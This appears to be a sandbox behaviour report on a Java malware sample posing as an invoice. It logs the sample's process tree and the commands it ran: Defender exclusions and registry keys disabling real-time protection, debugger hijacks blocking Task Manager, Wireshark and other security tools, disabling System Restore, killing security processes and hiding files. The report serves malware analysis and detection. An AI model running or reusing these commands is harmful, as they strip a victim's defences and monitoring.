PID 4036 wrote to memory of 4804	4036	java.exe	344
PID 4036 wrote to memory of 4804	4036	java.exe	344
PID 4804 wrote to memory of 4752	4804	cmd.exe	346
PID 4804 wrote to memory of 4752	4804	cmd.exe	346
PID 4804 wrote to memory of 4176	4804	cmd.exe	347
PID 4804 wrote to memory of 4176	4804	cmd.exe	347
PID 4036 wrote to memory of 2036	4036	java.exe	348
PID 4036 wrote to memory of 2036	4036	java.exe	348
PID 2036 wrote to memory of 3596	2036	cmd.exe	350
PID 2036 wrote to memory of 3596	2036	cmd.exe	350
PID 2036 wrote to memory of 852	2036	cmd.exe	351
PID 2036 wrote to memory of 852	2036	cmd.exe	351
PID 4036 wrote to memory of 4124	4036	java.exe	352
PID 4036 wrote to memory of 4124	4036	java.exe	352
PID 4036 wrote to memory of 2684	4036	java.exe	354
PID 4036 wrote to memory of 2684	4036	java.exe	354
PID 2684 wrote to memory of 504	2684	cmd.exe	356
PID 2684 wrote to memory of 504	2684	cmd.exe	356
PID 2684 wrote to memory of 2112	2684	cmd.exe	357
PID 2684 wrote to memory of 2112	2684	cmd.exe	357
PID 4036 wrote to memory of 2316	4036	java.exe	358
PID 4036 wrote to memory of 2316	4036	java.exe	358
PID 2316 wrote to memory of 2552	2316	cmd.exe	360
PID 2316 wrote to memory of 2552	2316	cmd.exe	360
PID 2316 wrote to memory of 624	2316	cmd.exe	361
PID 2316 wrote to memory of 624	2316	cmd.exe	361
PID 4036 wrote to memory of 4240	4036	java.exe	362
PID 4036 wrote to memory of 4240	4036	java.exe	362
PID 4240 wrote to memory of 4748	4240	cmd.exe	364
PID 4240 wrote to memory of 4748	4240	cmd.exe	364
PID 4240 wrote to memory of 2492	4240	cmd.exe	365
PID 4240 wrote to memory of 2492	4240	cmd.exe	365
PID 4036 wrote to memory of 1284	4036	java.exe	366
PID 4036 wrote to memory of 1284	4036	java.exe	366
PID 1284 wrote to memory of 4752	1284	cmd.exe	368
PID 1284 wrote to memory of 4752	1284	cmd.exe	368
PID 1284 wrote to memory of 5096	1284	cmd.exe	369
PID 1284 wrote to memory of 5096	1284	cmd.exe	369
PID 4036 wrote to memory of 2984	4036	java.exe	370
PID 4036 wrote to memory of 2984	4036	java.exe	370
PID 4036 wrote to memory of 4400	4036	java.exe	375
PID 4036 wrote to memory of 4400	4036	java.exe	375
PID 4036 wrote to memory of 3420	4036	java.exe	377
PID 4036 wrote to memory of 3420	4036	java.exe	377
PID 4036 wrote to memory of 4164	4036	java.exe	379
PID 4036 wrote to memory of 4164	4036	java.exe	379
PID 4036 wrote to memory of 5024	4036	java.exe	381
PID 4036 wrote to memory of 5024	4036	java.exe	381
PID 4036 wrote to memory of 4604	4036	java.exe	383
PID 4036 wrote to memory of 4604	4036	java.exe	383
PID 4036 wrote to memory of 2664	4036	java.exe	385
PID 4036 wrote to memory of 2664	4036	java.exe	385
PID 4036 wrote to memory of 4752	4036	java.exe	387
PID 4036 wrote to memory of 4752	4036	java.exe	387
PID 4036 wrote to memory of 5072	4036	java.exe	389
PID 4036 wrote to memory of 5072	4036	java.exe	389

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
504	attrib.exe
2416	attrib.exe
3876	attrib.exe
3116	attrib.exe
2976	attrib.exe
3848	attrib.exe
3784	attrib.exe
680	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\Invoice 645505.jar"
1⤵
- Loads dropped DLL
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4036
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1784
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2028
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2244
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2424
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:504
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:2416
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\plstY\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3876
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\plstY\Desktop.ini
  2⤵
  - Drops desktop.ini file(s)
  - Views/modifies file attributes
  PID:3116
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\plstY
  2⤵
  - Views/modifies file attributes
  PID:2976
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\plstY
  2⤵
  - Views/modifies file attributes
  PID:3848
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\plstY
  2⤵
  - Views/modifies file attributes
  PID:3784
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\plstY\oxPAo.class
  2⤵
  - Views/modifies file attributes
  PID:680
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1196
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:3716
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "1" /f
  2⤵
  PID:2392
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\UserAccountControlSettings.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2368
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\plstY','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\plstY\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2444
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "UserAccountControlSettings.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2776
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;" /f
  2⤵
  PID:3704
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Taskmgr.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1544
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_SZ /d "-" /f
  2⤵
  PID:3084
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ProcessHacker.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3644
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3172
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d "-" /f
  2⤵
  PID:480
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1480
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1272
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v "SEE_MASK_NOZONECHECKS" /t REG_SZ /d "1" /f
  2⤵
  PID:1104
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:1100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d "2" /f
  2⤵
  PID:4116
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4148
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:4252
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "Taskmgr.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4312
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4336
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4372
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    PID:4976
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    PID:1784
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:4464
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4568
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4672
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4688
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4752
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4820
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  PID:4848
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4904
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4936
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  PID:5048
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:5060
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:2056
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3712
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "ProcessHacker.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2316
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:4100
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3876
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  PID:3644
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    PID:1820
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    PID:1480
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2244
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4160
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    PID:4344
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:4400
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1104
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:4140
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:4472
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4504
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:4616
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:4252
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4336
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:4684
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:4696
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4548
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:4828
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:4860
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1204
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4952
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:4788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:32
    3⤵
    PID:2092
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4592
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:64
    3⤵
    PID:1412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE40" /reg:32
    3⤵
    PID:2492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4884
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:64
    3⤵
    PID:4848
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE4Data" /reg:32
    3⤵
    PID:3972
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:64
    3⤵
    PID:852
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IE5BAKEX" /reg:32
    3⤵
    PID:5044
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:748
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:64
    3⤵
    PID:5084
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\IEData" /reg:32
    3⤵
    PID:5072
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:64
    3⤵
    PID:648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MobileOptionPack" /reg:32
    3⤵
    PID:5116
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2880
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:64
    3⤵
    PID:3588
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Mozilla Firefox 75.0 (x64 en-US)" /reg:32
    3⤵
    PID:2668
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:2776
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1932
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:64
    3⤵
    PID:4404
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MozillaMaintenanceService" /reg:32
    3⤵
    PID:2640
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2888
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:64
    3⤵
    PID:2412
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\MPlayer2" /reg:32
    3⤵
    PID:2628
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:996
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:64
    3⤵
    PID:3396
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\ProPlusRetail - en-us" /reg:32
    3⤵
    PID:856
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5088
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:64
    3⤵
    PID:4164
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\SchedulingAgent" /reg:32
    3⤵
    PID:1820
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1480
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:64
    3⤵
    PID:1304
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\VLC media player" /reg:32
    3⤵
    PID:4472
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:4344
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4576
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:64
    3⤵
    PID:4700
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\WIC" /reg:32
    3⤵
    PID:4684
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4464
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:64
    3⤵
    PID:4944
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}" /reg:32
    3⤵
    PID:4572
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5092
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:64
    3⤵
    PID:4792
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" /reg:32
    3⤵
    PID:4960
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:4672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:64
    3⤵
    PID:644
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}" /reg:32
    3⤵
    PID:2492
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5028
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:64
    3⤵
    PID:3972
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}" /reg:32
    3⤵
    PID:5024
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5048
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:64
    3⤵
    PID:3704
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}" /reg:32
    3⤵
    PID:5072
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:5060
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:64
    3⤵
    PID:648
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" /reg:32
    3⤵
    PID:3052
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MpUXSrv.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3564
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3440
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:64
    3⤵
    PID:3744
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}" /reg:32
    3⤵
    PID:1916
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2324
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:64
    3⤵
    PID:3752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\{90160000-007E-0000-1000-0000000FF1CE}" /reg:32
    3⤵
